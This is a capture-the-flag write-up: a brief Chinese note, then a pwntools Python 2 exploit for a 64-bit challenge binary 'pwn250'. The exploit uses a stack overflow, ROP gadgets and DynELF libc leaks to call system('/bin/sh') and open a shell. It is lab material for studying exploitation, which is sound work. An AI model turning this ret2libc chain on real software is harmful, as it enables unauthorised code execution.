注:一个64位、有read和write、能看见flag的题(自己和胜利只差一个exp)
EXP
from pwn import*
# Spawn the CTF binary named in the write-up and parse its ELF so write@plt
# can be resolved symbolically below.
p =process('./pwn250')
elf = ELF('./pwn250')
# Addresses used by the two ROP chains in this script. Apart from
# write_plt_addr they are hard-coded 0x40xxxx / 0x60xxxx values, which
# only work if the binary is loaded at a fixed base (no PIE) and the
# return address can be overwritten (no effective stack canary); the
# write-up does not show a checksec, so this is inferred from use --
# confirm before reusing any of these numbers.
pop3_addr = 0x40056a          # presumably a gadget popping three registers (used to set three call arguments) -- verify in disassembly
write_plt_addr = elf.plt['write']   # write@plt, taken from the ELF's PLT
start_addr = 0x0400470        # returned into after each leak so the program re-runs and can be overflowed again (inferred from leak() below)
where_bin_sh_addr = 0x601070  # writable address the "/bin/sh" string is read into later -- assumption, not shown on the page
pop1_addr = 0x400633          # presumably a single-register pop gadget (sets system()'s argument) -- verify
def leak(addr):
    """Read back memory at *addr* from the running target via write().

    This is the callback handed to DynELF below: it builds a ROP chain
    that calls write(1, addr, 8), then returns to ``start_addr`` so the
    process restarts and can be driven again on the next call.

    Relies on the module-level ``p``, ``pop3_addr``, ``write_plt_addr``
    and ``start_addr``.

    Args:
        addr: absolute address in the target process to read from.

    Returns:
        The first 4 bytes of whatever ``p.recv()`` returns next. That is
        only the leaked memory if the program emits nothing else before
        the write() output; nothing on this page confirms that.

    Note:
        Written against the Python 2 pwntools API: ``str`` payloads are
        concatenated with ``p64()`` output and ``.encode('hex')`` is used,
        neither of which works under Python 3.
    """
    # 128 bytes of filler plus one 8-byte word reach the saved return
    # address. The offset comes from the write-up; the binary is not shown.
    payload = 'A'*128 +p64(0)
    # pop3_addr is assumed to pop the three registers that become write()'s
    # (fd, buf, count) -- the register order depends on the gadget, verify.
    payload += p64(pop3_addr)
    payload += p64(1)        # fd (stdout, if the gadget order is as assumed)
    payload += p64(addr)     # buf: the address to leak
    payload += p64(8)        # count: 8 bytes
    payload += p64(write_plt_addr)
    # Re-enter the program's entry path so a further overflow is possible.
    payload += p64(start_addr)
    p.send(payload)
    # Only 4 of the 8 requested bytes are kept; recv() may also return fewer
    # bytes than written if the output arrives fragmented.
    content = p.recv()[:4]
    # Python 2 only: str.encode('hex'); 'content or' guards an empty read.
    print ("%#x -> %s"%(addr,(content or '').encode('hex')))
    return content
# Resolve libc symbols without a local libc copy: DynELF walks the target's
# loaded ELF structures through the leak() callback defined above.
d =DynELF(leak, elf = elf)
system_addr = d.lookup('system','libc')
read_addr = d.lookup('read','libc')
log.info("[+]system_addr = %#x",system_addr)
log.info("[+]read_addr = %#x",read_addr)
# Second chain: read(0, where_bin_sh_addr, 8) to place a string in writable
# memory, then system(where_bin_sh_addr). As in leak(), the argument
# registers are whatever pop3_addr / pop1_addr actually pop -- verify.
payload = 'A'*128
payload += p64(0)
payload += p64(pop3_addr)
payload += p64(0)                  # fd (stdin, assuming the same gadget order as in leak())
payload += p64(where_bin_sh_addr)  # buf
payload += p64(8)                  # count
payload += p64(read_addr)
payload += p64(pop1_addr)          # presumably loads system()'s single argument
payload += p64(where_bin_sh_addr)
payload += p64(system_addr)
p.sendline(payload)
# Fixed pause so the chain reaches read() before the string is sent; this is
# timing-dependent and is the usual reason such scripts fail intermittently.
sleep(0.1)
p.sendline('/bin/sh\x00')
p.interactive()